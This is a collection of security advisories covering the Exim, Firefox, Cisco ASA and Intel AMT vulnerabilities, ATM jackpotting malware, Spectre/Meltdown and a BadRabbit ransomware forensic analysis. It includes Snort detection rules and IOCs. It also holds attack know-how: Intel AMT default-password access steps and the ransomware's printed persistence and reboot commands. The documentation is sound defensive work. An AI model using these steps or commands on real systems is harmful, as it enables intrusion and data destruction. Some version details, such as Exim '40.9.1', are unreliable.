Exim MTA

vSOC SPOT Report: Exim Remote Code Execution Vulnerability

Overview

On March 6th, 2018, a security researcher by the name of Meh Chang of Devcore, a Taiwanese security consulting firm, published a remote code execution vulnerability that is present in the mail transfer agent, Exim. Exim is a mail transfer agent (MTA for short) for Unix servers that was developed at the University of Cambridge. Its use is very widespread, estimated to be used on hundreds of thousands of different servers, and it is the default mail transfer agent on some popular web control panels, such as cPanel. It is also the default mail transfer agent in the Debian and Ubuntu Linux distributions. Due to the widespread use of Exim, we believe this vulnerability is particularly dangerous. The vulnerability was first disclosed to Exim on February 2nd, 2018, and a patch was published on February 10th to resolve this issue. This vulnerability is currently being tracked under CVE-2018-6789.

Attack Details

The attack exploits the Base64 decode function of the Exim MTA. The AUTH function of Exim, in most cases, uses Base64 encoding to communicate with the client. Exim uses a buffer to store the decoded Base64 data. Chang found that it was possible to use a certain invalid Base64 string to cause Exim to allocate less space for the buffer than it consumed, creating a buffer overflow. Normally this buffer overflow is harmless, but it is possible to craft the Base64 string to a certain length to overwrite critical data.

Remote execution is possible depending on the use of the Access Control List (ACL) strings in Exim. Chang found that it was possible to overwrite the ACL strings, and then initiate an ACL Check using the ‘MAIL FROM’ SMTP command. When an ACL Check is performed, any code in these strings will be executed if it encounters ${run{cmd}}.

Potential Impact

There have been no known active exploits or proofs of concept of this vulnerability, but this is expected to change in the days following the disclosure due to the ease of exploiting it. Also, the estimated number of machines affected by this vulnerability is very high. A successful exploit of this vulnerability could allow the attacker to gain full access to the mail server. This could then be used to compromise privileged information through the use of reading emails, or the copying, modifying, sending, or deleting of email. This server can then be used as a launching point for further attacks within your network. Even if you are not using Exim within your environment for mail, you could still be vulnerable if Exim is installed and there are open SMTP ports that allow incoming mail.

What You Should Do

Exim has already published Exim 40.9.1 to fix this vulnerability. ALL versions of Exim prior to 40.9.1 are vulnerable to this. Patches are available for Debian, Fedora, SuSE, and Ubuntu Linux distributions as standard packages. Some vulnerability scanners have already added checks for this vulnerability, such as Qualys, Rapid7 and Tenable. We would recommend you review your environment for any indication of vulnerable mail servers and ensure these are updated

GuidePoint’s vSOC will provide additional information as it is made public to help protect our clients.

Supporting Information

Firefox

vSOC SPOT Report: Mozilla Firefox Arbitrary Code Execution Vulnerability

Overview

On January 29th, Mozilla developer Johann Hofmann reported that there was a major Arbitrary Code Execution vulnerability (CVE-2018-5124) within the browser’s user interface (UI) that allows a remote attacker to execute specially crafted code by exploitation of the unsanitized HTML output in the browser’s “Chrome” component. The UI vulnerability has received a CVSS score of 8.8 out of 10 due to the ability for it to be easily exploited without the user’s knowledge.

Technical Overview

The attacker hides unsanitized HTML code within the Firefox “Chrome” component, which does not run separately from the HTML present on a web page. If the attacker hides unsanitized HTML inside the browser’s UI code, the execution chain can be broken away from Firefox’s UI component and allow commands to be run on the computer. The code itself runs with whatever the current user’s privileges are. For example, if the user is an administrator then the code can run SYSTEM level commands. Due to the fact CVE-2018-5124 relies on running untrusted code, it has the ability to be hidden within an iframe, loaded-off screen, or loaded via a drive-by download without the user’s knowledge.

Potential Impact

Exploit kit developers are expected to jump on this vulnerability and add CVE-2018-5124 to their arsenal of targeted vulnerabilities in order to load malware on users’ machines. The biggest impact would come from exploitation of this flaw involving a user with administrative privileges and could allow an attacker to gain a foothold due to the factors involving this vulnerability by running SYSTEM level commands on the compromised system. This security flaw allows an attacker to easily deliver malware and potentially gain control over the user’s machine. This vulnerability is not currently known to affect Firefox for Android and Firefox 52 ESR.

What You Should Do

It is recommended that users update their version of Mozilla Firefox if it is one of the following versions:

  • Mozilla Firefox 56.x
  • Mozilla Firefox 57.x
  • Mozilla Firefox 58.0.0

Mozilla has fixed the flaw by sanitizing the code executed by its chrome UI component, and this is included as part of the new patch released for the vulnerable versions.

Supporting Information

ATM

vSOC SPOT Report: Ploutus-D ATM Malware

Overview

On Friday, January 26th, vendor Diebold Nixdorf released a statement to customers housing their front load ATM appliances of an attack being leveraged against them. The Ploutus-D malware, which has previously been seen in Latin America, has been observed in several regions of the United States including the Pacific Northwest, Texas, and several locations across the Southeast. The attack is coined “Jackpotting” due to the ability to make the ATM device unload all of its funds.

Attack Details

In order for an attacker to gain access to implant the malicious binary, they must have physical access to the device. They must open the top hat of the ATM via a clone key, picking, forcing the lock or any other method. Once they gain physical access, the attacker will attach a USB or PS/2 keyboard and either load the malicious binary via USB drive or other removable media or will replace the hard drive of the system with one preloaded with the malicious operating system and program files. Once complete, this will allow the attacker to “jackpot” the ATM directly via command line or remotely via SMS text message.

Recognizing Jackpotting Attacks

Physical access is necessary to perform this attack as well as potential damage to the device. Routine sweeps should be made by the device administrator to ensure there is no damage to the locking mechanism, top hat, or casing indicating that the device has been tampered with. Additionally, if the device has a built-in tamper alarm to the opening of the top hat, it should be enabled.

ATM

Image 1: Hole drilled into ATM for endoscope – Courtesy of EuroPol

Keyboard Attached to ATM

Image 2: Top hat removed and Keyboard attached – Courtesy of FireEye

How Jackpotting Works

The attacker gains physical access to the computer inside the ATM either via forcing the top hat, or in the case of embedded systems, via social engineering their way into the maintenance area for the devices. They then load the Ploutus-D Configuration utility (AgilisConfigurationUtility.exe) along with software dependencies onto the system which permits the attacker control. Once the applications are installed, the malware hooks into the keyboard and permits the use of the “F” function keys (typically at the top of the keyboard, as in the above image) as well as the number keys to provide input. At this point, the attacker can press the “F3” key and distribute funds from the device without authorization or can close everything back up and create a cash drop where they are able to distribute funds at their leisure.

In order for this particular attack to be successful, the attacker MUST have the 8 digit activation code, which is only valid for 24 hours.

Attack Detection and Prevention

To detect and prevent this attack, the best starting point is to reinforce the device’s physical security. Additional security controls for ATM maintenance and stronger access control are critical. Additional options to reduce the attack surface are:

  • Many of the ATMs in circulation use the same keys. Replacing the top hat lock with a different lock will reduce the instances of this crime.
  • Have a technician physically inspect the device at regular intervals to ensure it has not been tampered with.
  • Use appropriate locking mechanisms to secure the head compartment of the ATM.
  • Control access to areas used by personnel to service the ATM.
  • Implement access control for service technicians based on two-factor authentication.
  • Use firmware with the latest security functionality.
  • Use the most secure configuration of encrypted communications including physical authentication:
    • Agilis® XFS for Opteva®
    • Advanced Function Dispenser (AFD) Version 4.1.41 incl.AFD Application Firmware Version – 6.0.1.0 (or later)
    • Agilis® XFS for Opteva®, Core Version 4.1.59 (or later)
    • Optional – OSD+/DSST 3.3.30 (or later)
  • Investigate suspicious activities such as deviating or non-consistent transaction or event patterns, which are caused by an interrupted connection to the dispenser.
  • Have a plan in place for what to do if someone has physically tampered with the ATM.
    • Who is the point of contact?
    • Who is your local law enforcement agency?
    • Do you have a regular contact there?
  • Running regular updates and ensuring that your operating system is still supported (Many of these attacks are made far easier due to the ATM running Windows XP).
  • Implementation of full disk encryption and encrypt the connection between the ATM and the dispenser.

Affected Systems

  • Diebold Nixdorf Front-load Opteva terminals with the Advanced Function Dispenser (AFD).
    • Opteva 500 and 700
  • Other terminals and ATM vendors without physical authentication could be affected.

IOCs

The following IOCs are available to detect the instance of the attacker:

FileSystem:
  • [D-Z]:\Data\P.bin
  • C:\Diebold\EDC\edclocal.dat

The following files should be found at the same place where the service Diebold.exe is located:

  • Log.txt
  • Log2.txt
  • P.bin – Mac address of the system, plus string: “PLOUTUS-MADE-IN-LATIN-AMERICA-XD”
  • PDLL.bin – Encoded version of P.bin
Mutex names:
  • Ploutos
  • DIEBOLDPL
  • KaligniteAPP
Services:
  • Service Name: DIEBOLDP
Registry:

\\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=”Diebold.exe,%system32%/userinit.exe”

Additional Resources

Cisco Logo

vSOC SPOT Report: Cisco Adaptive Security Appliance RCE & Denial of Service Vulnerability

Update (2018-01-31): SNORT Signatures

After further research, vSOC has located Snort signatures published by the fox-srt team, which can detect exploitation of this vulnerability.

# IDS signatures for https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1:

alert udp any any -> any 500 (msg:"FOX-SRT - Suspicious - Possible Fragmented Cisco IKE/isakmp Packet HeapSpray (CVE-2018-0101)"; flow:to_server; content:"|84|"; offset:16; depth:1; content:"|02 08 |"; distance:1; within:2; fast_pattern; byte_test:4,>,5000,4,relative; byte_test:2,>,5000,10,relative; byte_extract:4,36,fragment_match; byte_test:4,=,fragment_match,52,relative; byte_test:4,=,fragment_match,136,relative; byte_test:4,=,fragment_match,236,relative; threshold:type limit, track by_dst, count 1, seconds 600; classtype:attempted-admin; sid:21002339; rev:4;)

alert udp any any -> any 500 (msg:"FOX-SRT - Exploit - Possible Shellcode in Cisco IKE/isakmp - tcp/CONNECT/"; content:"tcp/CONNECT/"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 600; priority:1; classtype:attempted-admin; sid:21002340; rev:2;)

These alerts have been provided by fox-srt and can be found at their GitHub site: https://gist.github.com/fox-srt/09401dfdfc15652b22956b9cc59f71cb

Overview

On Monday January 29th, Cisco released a statement to customers that they had identified a vulnerability (CVE-2018-0101) affecting Cisco ASA (Adaptive Security Appliance) and Cisco Firepower Threat Defense Appliances via the Secure Sockets Layer (SSL) VPN functionality of the devices which could allow an unauthenticated remote attacker to create a denial of service condition by reloading the device to remotely execute specially crafted malicious code. The vulnerability is due to an attempt to double free a region of memory when the webvpn feature is turned on for the Cisco ASA device.

Attack Details

The vulnerability makes this very easy to exploit and as a result, it was rated a 10 out of 10 on the CVSS (Common Vulnerability Scoring System). The attack involves an attacker sending multiple crafted malformed XML packets to the Cisco ASA devices and Cisco Firepower software. If the exploit is successful, the attacker will then have the ability to execute unauthorized code on the devices. Depending on the nature of the code, the attacker can gain full control over the device. This attack does not require physical access and can be carried out remotely. The ASA device(s) are only vulnerable if they have the webvpn feature enabled within the OS settings.

Attack Detection and Prevention

Attack patterns will vary once exploits are developed and used in the wild. Some possible detection methods include monitoring XML packets sent to Cisco ASA hosts via packet capture, or to monitor for sudden regular spikes in traffic sent to Cisco ASA hosts, as these spikes would likely be an attempt to force constant restarts on the device. To determine whether the webvpn service is enabled, administrators can use the command show running-config webvpn at the command line. Additionally, the show version command can be run to verify which version of Cisco ASA Software is running on the device. The Cisco Adaptive Security Device Manager (ASDM) can also show the software release in the table that appears by the login window, or in the upper-left corner of the ASDM interface.

The show version command will also show the release version for Cisco Firepower Threat Defense (FTD) devices. Version 6.2.2 of FTD devices are vulnerable because it incorporates code from both Firepower and ASA devices, as it was the first release that supported the Remote Access VPN feature.

Affected Systems

  • 3000 Series Industrial Security Appliance (ISA)
  • ASA 5500 Series Adaptive Security Appliances
  • ASA 5500-X Series Next-Generation Firewalls
  • ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
  • ASA 1000V Cloud Firewall
  • Adaptive Security Virtual Appliance (ASAv)
  • Firepower 2100 Series Security Appliance
  • Firepower 4110 Security Appliance
  • Firepower 9300 ASA Security Module
  • Firepower Threat Defense Software

Recommendations

Cisco has released several tables showing the versions to update to and the original ASA major release. It is recommended to ensure both the ASA devices and FTD software is updated to the version released to counteract the vulnerability.

Cisco ASA Major Releases

[1] Cisco ASA Major release table (Cisco, 2018)

Cisco FTD Major Relases[1] Cisco FTD Major release table (Cisco, 2018)

Workarounds

There are no workarounds for this vulnerability. However, Cisco has already released updates that address this vulnerability. Versions that include this fix are listed in the ASA Major release table above.

Additional Resouces

Intel AMT

vSOC SPOT Report – Intel AMT Vulnerability

Overview

On Friday, January 12th, 2018 researchers at F-Secure disclosed a vulnerability involving Intel’s Active Management Technology (AMT) firmware. The vulnerability can allow an attacker with physical access for as little as 30 seconds to gain full remote access to the machine.

This bypasses operating system logins, BIOS, TPM, BitLocker and local firewall credentials. Mitigation primarily involves disabling AMT or changing the AMT default credentials, which are different from that of the BIOS and the OS.

Technical Overview

Intel’s Active Management Technology (AMT) is a feature built into Intel processors that use vPro, as well as in machines using processors from their Xeon line. This limits the effect primarily to enterprise-grade workstations and servers.

The vulnerability was discovered in July of 2017 by F-Secure’s Harry Sintonen, however, it was not disclosed until the morning of January 12th, 2018. A timeline of events between discovery and disclosure can be found on his website.

Attackers can access the machine by pressing ctrl-p during the machine’s boot-up sequence to access the boot menu. From there all that’s required is to navigate to and select  “Intel(R) Management Engine BIOS Extension (MEBx)”, select “MEBx” login and type in the default password of “admin”.  Additionally, if USB provisioning has not been disabled it’s also possible to carry out the attack automatically with a properly setup and configured flash drive.

Once MEBx has been entered via the boot menu, the intruder can then change the default password and enable remote access. While ethernet access will be available “right out of the box,” wifi access is not enabled by default. However, this can be easily set with a few changes to the wireless management once ethernet access has been established. Configuring the machine to reach out on it’s own is also possible via Client Initiated Remote Access (CIRA). This means that the system can still be accessed from any network on which the client can send outbound data through the firewall.

Potential Impact

All Intel processors that utilize vPro software or possess an Intel Xeon processor are potentially vulnerable. The exception to this seems to be Asus laptops or those that have been specifically configured to request a BIOS password before allowing access to the AMT MEBx extension.

A list of all vPro systems and manufacturers is available from Intel’s website here: https://msp.intel.com/find-a-vpro-system. Unfortunately, there does not seem to be an equivalent resource for those machines containing Xeon processors.

What You Should Do

Mitigation primarily involves one of two aspects, the first of which being to disable AMT altogether, however, this is not possible in some business contexts depending upon how reliant the organization is on AMT facilitated services.

The second method of mitigation is to go in and manually set a password for AMT. This provides some measure of protection, however, it can still be bypassed by performing a CMOS reset. This is generally done by removing and replacing the CMOS battery, or shorting a jumper on the motherboard, which essentially turns the CMOS memory “off and back on again”. Simply turning off the host does not affect the CMOS.

This is still recommended if AMT cannot be disabled as it significantly increases the amount of time and difficulty for an attacker to successfully carry out the attack, reducing the likelihood of a successful compromise happening unnoticed in a public place, such as through the proverbial “evil maid” attack.

It’s also worth noting that some vulnerability and system management tools also often collect data and statistics such as hardware information. This could be useful for identifying how many and which machines may be vulnerable to the attack.

GuidePoint’s vSOC will provide additional information as it is made public to help protect our clients.

Supporting Information

vSOC SPOT Report – Spectre and Meltdown

Overview

On January 1st, 2018 Intel disclosed a critical alert around a large variety of Intel CPUs that allows an attacker to read memory belonging to other processes. Further details from Google Project Zero, Cyberus Technology private researcher Paul Kocher, and various universities surfaced January 3, including white papers. The vulnerabilities are named Spectre and Meltdown. Numerous other names also circulated in the press and on social media, including Meldown [sic], KAISER, KPTI, and FUCKWIT [sic].

Spectre has been assigned CVEs CVE-2017-5753 and CVE-2017-5715. Meltdown has been assigned CVE CVE-2017-5754. Some elements of Spectre, at least for the moment, cannot be mitigated in software.

The flaws affect Intel CPUs produced after the original Pentium (P5 architecture), with the exception of Itanium and pre-2013 Atom CPUs, on all operating systems that run on the x86 and x86-64 architecture, including but not limited to Microsoft Windows, Linux, Mac OS X, and embedded systems using Intel CPUs.

AMD states its CPUs are immune to Meltdown but some researchers report Spectre works on AMD CPUs. AMD CPUs achieved a degree of acceptance in the 2005-2010 timeframe in enterprises but are much less common in enterprise environments than Intel.

Additionally, ARM has stated its high-end Cortex CPUs are vulnerable to Spectre. Apple uses ARM-based CPUs in its iPhone and iPad products but has not released a statement regarding their vulnerability or immunity to this flaw. Devices based on Google Android and Chrome OS also use ARM. Google has released patches but in some cases the patch has to be released by the device manufacturer and/or the carrier.

Linux vendor Red Hat states a the Spectre condition exists in IBM System Z, Power 8, and Power 9 CPUs.

This vulnerability was privately disclosed to Intel and operating system vendors, but security researchers working independently have developed proof of concept code. In a statement released on January 3, Intel stated it is working with AMD and ARM, as well as with major operating system vendors, on fixes.

Microsoft released emergency patches for supported versions of Windows on January 3, and is patching Azure on an accelerated schedule. Microsoft has not stated if end-of-life systems such as Windows Vista, Windows XP, and Windows Server 2003 will be included. Apple included fixes in macOS 10.13.2, and plans more fixes in macOS 10.13.3 by the end of the month. Google addressed the issue on Android and Chrome OS in its January 2018 security patch.

Patches for Linux are in work. Amazon has released patches for Amazon Linux. Customers can roll the patch to existing AMIs; new AMIs automatically have the patch in place. Red Hat has released patches for some versions of Red Hat Enterprise Linux, with patches for the other supported versions in work. Intel’s initial recommendation regarding Linux was incomplete.

Security researcher Erik Bosman released proof of concept code on Twitter on January 3. The original researchers will release their proof of concept code after security patches are released, including code that demonstrates stealing passwords.

Technical Overview

KPTI (Kernel Page Table Isolation) is a technique to isolate kernel code from userspace, so that the code is accessible, but only indirectly. It is a key security feature in modern CPUs and operating systems. Userspace is able to make calls to the kernel even though it does not know where it exists in memory. KAISER refers to a flaw that permits an attacker to defeat these measures and jump from CPU ring 3 (where user applications run) to ring 0 (where the kernel runs).

The exploit works by taking advantage of speculative execution. When faced with a branch in program flow, modern Intel CPUs will execute both possibilities, so it has the results ready ahead of time, and simply discard the result it didn’t need. Under some conditions, such speculative code runs with fewer security measures than normal code. The exploits take advantage of this unusual condition to bypass the CPU’s normal security measures. There are three conditions under which this can occur, not all of which are present in all affected CPUs.

Early reports had suggested this was a way to overwrite code. Intel has stated it only makes it possible for a process to read memory belonging to a different process.

Potential Impact

This vulnerability can be potentially exploited to defeat ASLR and KPTI on affected systems and read memory contents belonging to other processes running on the machine. At this point, the most useful scenario for an attacker would be to use it to steal passwords, credit card numbers, or other sensitive but succinct data from memory. On desktops and laptops, it can be exploited remotely via JavaScript residing on a web page. It could also be used in cloud environments to cross over into other virtual machines and steal data belonging to other customers.

The patches for this flaw may prove to be unpopular due to early reports stating to expect performance hits ranging from 5-30 percent. Reports from the field indicate 20% is a more common worst-case scenario on database and web servers. On desktops, the performance impact generally is minimal.

What Should You Do

Having a complete inventory of IT systems is critical for addressing vulnerabilities such as this one, including hardware make and model, CPU architecture, and operating system.

Scan your network for CVE-2017-5753, CVE-2017-5715, and CVE-2017-5754. Apply any applicable patches. Keep in mind some fixes will not be available until later in the month. If your vulnerability management solution permits, scan your Mobile Device Management platform to ensure you are running post-January 2018 versions of Android. Workstations and virtual machines in cloud environments, which have the greatest exposure to the outside world, should have the highest priority when deploying patches. Servers running on virtual infrastructure under your control will be harder to exploit.

There are some caveats to patching Windows for this vulnerability. A Microsoft article on compatibility issues between this patch and certain third-party antivirus solutions is included in the Supporting Information section at the end of this document. GuidePoint recommends you confirm with your antivirus vendor that its solution is compatible with Microsoft’s update for Spectre and Meltdown. As GuidePoint learns more regarding antivirus compatibility or lack thereof, we will post updates on our blog at https://www.guidepointsecurity.com/blog/.

Furthermore, under some conditions, the update for Windows 10 can throw a false error message stating that it failed when it succeeded. Follow up patching efforts with scanning from your vulnerability management solution to validate that patches actually did apply and are no longer vulnerable.

Slowdowns, although initially overstated, still have the potential to occur. The effect on workstations will be minimal. Servers that perform heavy I/O, such as web servers and databases, will incur more significant performance hits. GuidePoint recommends testing any applicable patches for performance impact before upgrading web farms. Be prepared to update software such as Apache that may need revisions to work around performance issues introduced by these security updates.

GuidePoint also recommends you advise your employees to update their personal computers and devices, with the caveat that your IT department is not responsible for providing support. Microsoft provides free support for home users of Windows who experience difficulty related to applying security patches.

References

BadRabbit Malware Analysis

Image Source:http://www.designlync.com/about.html

Image Source http://www.designlync.com/about.html

10.27.2017 UPDATE:  BadRabbit CnC Dormancy

Looks like the Threat Actors caged this “Killer Rabbit” for now.  Most of the servers and sites used by the hackers behind the ransomware appear to be taken out of service for no.[1]

Overview: On October 24, 2017, Bad Rabbit, a ransomware infection, a new variant of Petya, has hit a number of organizations in Russia and Ukraine.  First announced in a tweet, the Russian cybersecurity firm Group-IB said initially three media organizations in the country have been hit by file-encrypting malware. [2]

At the same time, Russian news agency Interfax said its systems have been affected by a “hacker attack”.

“Interfax Group’s servers have come under a hacker attack. The technical department is taking all measures to resume news services. We apologize for inconvenience,” [3]
This new strain of ransomware, actively being used in the wild and code-named “BadRabbit”, disguises itself as an Adobe Flash installer in order to gain the user’s trust.  It reportedly uses EternalBlue and Mimikatz to steal passwords and spread in a “worm-like” fashion.

Once executed, the ransomware modifies the bootloader and encrypts the files on the user’s machine.  After the infection is complete BadRabbit presents the user a UI demanding a Bitcoin ransom payment in order to have the files unlocked.

The malware also has the capability to spread throughout the local network via SMB or limited credential brute force over Windows Management Instrumentation Command-line (WMIC) and PSExec after infecting the user’s machine.

Initial reports indicated the ransomware was targeting multiple Eastern-European countries including Ukraine, Russia, Turkey, and Bulgaria, however, additional reports of the ransomware have surfaced in South Korea, Japan, and the United States. Reports surfaced of attacks to government institutions, news agencies, and transportation organizations. The ransomware is reportedly being delivered through compromised legitimate websites – mainly news and media sites at the time of this writing.

Ukrainian organizations have posted about systems failing: payment systems on the Kiev Metro appear to have fallen victim to the attack, while in a statement on its Facebook page, Odessa International Airport said its information system had been hit by hackers.[4]

“We inform that the information system of the International Airport “Odessa” suffered a hacker attack,” a translation of the post says. [5]

On 24 OCT 2017 – 05:20PM, ESET announced that their telemetry has detected hundreds of occurrences of Diskcoder.D. Most of the detections are in Russia and Ukraine, however, also there are reports of computers in Turkey, Bulgaria and other countries are affected. [6]

Bad Rabbit shares some similarities with Petya – the ransom note looks almost identical and it can also use SMB to propagate across the infected network. However, researchers say much of the code appears to have been rewritten in this case.

GPS Huntmasters

GuidePoint’s Forensic Intelligence Division, GPS Huntmasters, has had the opportunity to analyze a couple variants of the BadRabbit malware/ransomware.  Through this analysis this elite GuidePoint team was able to confirm additional (unannounced) IOCs [7] as well as documenting the software’s [8] behavior within our testing environments.

Technical Overview

BadRabbit has been distributed through malicious websites with fake Adobe Flash updates with popup (decision) boxes that the end user must execute.  After the user clicks on the malicious popup, the ransomware is downloaded (via http/https) to the victim in the form of a malicious windows binary (e.g., install_flash_player.exe). After execution, the file will require the user to accept a Windows User Account Control (UAC) popup granting the malware escalated rights to the system.

Once executed, the malware deploys the ransomware onto the user’s machine completely compromising the end-user.

Image: Group-IB [9]

#_ftn1

The malware drops the file Infpub.dat, which is then executed by a rundll32 command. Infpub.dat will then create the files cscc.dat and dispci.exe within the C:\Windows directory. The file cscc.dat is actually a renamed file from the legitimate DiskCryptor program. These files are used to encrypt the disk and modify the bootloader preventing a normal bootup of Windows. A scheduled task is also created to ensure the dispci.exe file is run at bootup. Upon reboot, the user is presented with the Ransomware message demanding payment.

Landfall: BadRabbit

Although the USA and other western countries were not specifically targeted by this campaign, it is only a matter of time before BadRabbit will make US “Landfall”. In fact, according to cybersecurity and antivirus vendor Avast, BadRabbit has now been detected in the USA [10](2:44 PM – 24 Oct 2017).

Remember, BadRabbit attempts to spread through SMB. [11] It does this with account information stolen from the victim using Mimikatz or by trying an embedded list of common account names and passwords that is hard coded in the actual malware.

GuidePoint Forensic Analysis

On October 24, 2017 GuidePoint’s Forensic Intelligence team obtained and analyzed two samples of BadRabbit. The GuidePoint team has included a summary of our findings that may help future identification and of upcoming variants.

It should be noted that with each variant, file names and hash values may change depending on software variants and Threat Actor activity and strategy.

Analyst Note:  Although the tested samples were done in a forensically pure fashion BadRabbit did exhibit anti-forensic features and file deletion capabilities as noted in some “zero-byte file size” noted during our analysis and testing.

Samples Analyzed

File name: 9y6VPA4OK.exe
File size: 441899
MD5: fbbdc39af1139aebba4da004475e8839
SHA1: de5c8d858e6e41da715dca1c019df0bfb92d32c0
SHA256: 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da

File name: infpu.dll
File size: 410760
MD5: 1d724f95c61f1055f0d02c2154bbccd3
SHA1: 79116fe99f2b421c52ef64097f0f39b815b20907
SHA256: 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648

File name: 6CQZJL6EH.exe
File size: 142848
MD5: b14d8faf7f0cbcfad051cefe5f39645f
SHA1: afeee8b4acff87bc469a6f0364a81ae5d60a2add
SHA256: 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93

Forensic Overview

This malware has multiple elements. Execution starts in the binary file that is responsible for dropping and installing other elements.

During testing, once launched initial malware dropped files and conducted the following;
• Clears the windows event log
• Clears the journal log
• Drops executables to the windows directory (C:\Windows) and starts them
• Shows the ability to spread by using its contained functionality to enumerate network
shares of other (attached) devices
• Uses shutdown.exe to shut down or reboot the system
• Contacts additional CnC servers
• Contains functionality to register a low-level keyboard hook
• Contains functionality to infect the boot sector
• File names are dynamically generated
**NOTE: Dropped files appear to be kernel level key loggers

Sample Analysis: fbbdc39af1139aebba4da004475e8839

Memory Analysis

Analysis of volatile memory (RAM) disclosed that there were URLs that were forensically resident during testing that are attributed to the binaries tested;
hxxp://rb.symcb.com/rb.crl
hxxp://s.symcd.com
hxxp://ts-aia.ws.symantec.com/sha256-tss-ca.cert
hxxp://ts-ocsp.ws.symantec.com
hxxp://ocsp.thawte.com

Noted Binary Activity

Uses schtasks.exe or at.exe to add and modify task schedules
C:\Windows\System32\schtasks.exe schtasks /Delete /F /TN rhaegal

Contains functionality which may be used to detect a debugger (GetProcessHeap)
GetModuleHandleW,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,memcpy,GetProcessHeap,Get
ProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree

CnC Connection Attempts:
23.60.139[.]27

Drops PE Files

Path:  C:\Windows\infpub.dat (zero byte file size)
MD5: D41D8CD98F00B204E9800998ECF8427E
SHA1: 79116FE99F2B421C52EF64097F0F39B815B20907
SHA-256: 579FD8A0385482FB4C789561A30B09F25671E86422F40EF5CCA2036B28F99648

Binary Startup Activity

Test System is Windows 7 sp1

  • 9y6VPA4OKL.exe (PID: 3424 cmdline: ‘C:\Users\user\Desktop\9y6VPA4OKL.exe’ MD5: FBBDC39AF1139AEBBA4DA004475E8839)
  • rundll32.exe (PID: 3452 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cmd.exe (PID: 3464 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: AD7B9C14083B52BC532FBA5948342B98)
  • schtasks.exe (PID: 3484 cmdline: schtasks /Delete /F /TN rhaegal MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • cmd.exe (PID: 3500 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR ‘C:\Windows\system32\cmd.exe /C Start \’\’ \’C:\Windows\dispci.exe\’ -id 4038216979 && exit’ MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cmd.exe (PID: 3520 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR ‘C:\Windows\system32\shutdown.exe /r /t 0 /f’ /ST 15:25:00 MD5: AD7B9C14083B52BC532FBA5948342B98)

 cleanup

Windows Behavior

C:\Windows\system32\IMM32.DLL
– read attributes and synchronize and generic read
– read data or list directory and execute or traverse and synchronize

C:\Windows\AppPatch\sysmain.sdb
– read attributes and synchronize and generic read

C:\Windows\system32\apphelp.dll
– read data or list directory and execute or traverse and synchronize

Sample Analysis: 1d724f95c61f1055f0d02c2154bbccd3

Memory Analysis
N/a

Noted Binary Activity

Boot Survival:
Uses schtasks.exe or at.exe to add and modify task schedules
– C:\Windows\System32\schtasks.exe schtasks /Delete /F /TN Rhaegal

Spawns processes
– C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR
‘C:\Windows\system32\shutdown.exe /r /t 0 /f’ /ST
– C:\Windows\System32\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR ‘C:\Windows\system32\cmd.exe /C Start \’\’ \’C:\Windows\dispci.exe\’ -id 2835140717 && exit’
– C:\Windows\System32\schtasks.exe schtasks /Delete /F /TN rhaegal

Drops PE Files

(Zero byte File Size)
MD5: D41D8CD98F00B204E9800998ECF8427E
SHA1: B4D371272FE9C5A7C7936D32DEE609019CC24C31
SHA-256: FA6FE917BCB4F9CE5FE03B71F5E4AF392FB63A4DA4E142C691CCAF9042AB4DCE

Binary Startup Activity

 Test System is Windows 7 sp1

  • loaddll32.exe (PID: 3276 cmdline: loaddll32.exe ‘C:\Users\user\Desktop\infpub.dll’ MD5: D2792A55032CFE825F07DCD4BEC5F40F)
  • rundll32.exe (PID: 3284 cmdline: rundll32.exe C:\Users\user\Desktop\infpub.dll,#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cmd.exe (PID: 3296 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: AD7B9C14083B52BC532FBA5948342B98)
  • schtasks.exe (PID: 3316 cmdline: schtasks /Delete /F /TN rhaegal MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • cmd.exe (PID: 3328 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR ‘C:\Windows\system32\cmd.exe /C Start \’\’ \’C:\Windows\dispci.exe\’ -id 2835140717 && exit’ MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cmd.exe (PID: 3340 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR ‘C:\Windows\system32\shutdown.exe /r /t 0 /f’ /ST 16:03:00 MD5: AD7B9C14083B52BC532FBA5948342B98)

 cleanup

Windows Behavior

N/a

Sample Analysis: b14d8faf7f0cbcfad051cefe5f39645f

Memory Analysis

Analysis of volatile memory (RAM) disclosed that there were URLs that were forensically resident during testing that are attributed to the binaries tested;

hxxp://diskcryptor.net/

Noted Binary Activity

Contains functionality to register a low-level keyboard hook
– SetWindowsHookExW 00000002,Function_00003FC0,00000000,00000000
Contains functionality for read data from the clipboard
Contains functionality to infect the boot sector
Detected the Windows Explorer process (often used for injection)
Connects to many different private IPs via SMB (likely to spread or exploit)

Drops PE Files

This file has been seen in most BadRabbit samples analyzed
C:\Windows\dispci.exe (zero byte file size)
File Type: PE32 executable (console) Intel 80386, for MS Windows
MD5: D41D8CD98F00B204E9800998ECF8427E
SHA1: AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
SHA-256: 8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
File name: cscc.dat
File size: 181448
